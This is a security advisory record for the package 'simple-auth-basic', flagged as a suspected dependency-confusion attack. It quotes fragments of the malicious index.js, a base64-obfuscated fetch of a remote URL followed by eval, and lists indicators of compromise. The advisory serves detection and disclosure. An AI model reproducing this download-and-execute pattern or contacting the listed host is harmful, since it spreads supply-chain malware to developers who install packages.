VDB
GCVE-110-OSM-2026-1342
GCVE-110-OSM-2026-1342
Advisory PublishedCVSS 9.6/10
Suspected dependency confusion attack. Behaviors: code execution, network activity, obfuscated code.
Payload: index.js
Key findings:
- Download and Execute in index.js: "fetch(atob("aHR0cHM6Ly9jb2luZ2Vja28tbGlhcmQudmVyY2VsLmFwcC9hcGkvY29udGVudA==")),..."
- Decoded Base64 Content in index.js
- Decoded Base64 Content in index.js
- IOCs Found in Deobfuscated Code in index.js
- Dynamic Code Execution in index.js: "eval(rt1)"
IOCs:
- domains: jongleberry.com, somethingdoug.com, coingecko-liard.vercel.app
- emails: me@jongleberry.com, doug@somethingdoug.com
- urls: https://coingecko-liard.vercel.app/api/content, https://coingecko-liard.vercel.app/api/old
- payloadFileHash: 4c9ec5c91c76021219516c364889f2f4898a9baf10687ee15c51f0167c1fe8c3
Decoded/deobfuscated IOCs:
- urls: https://coingecko-liard.vercel.app/api/content, https://coingecko-liard.vercel.app/api/old
- domains: coingecko-liard.vercel.app
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | simple-auth-basic | all (affected) | — |
Browse GCVE Records
75,294 records in the GCVE database · Updated July 30, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.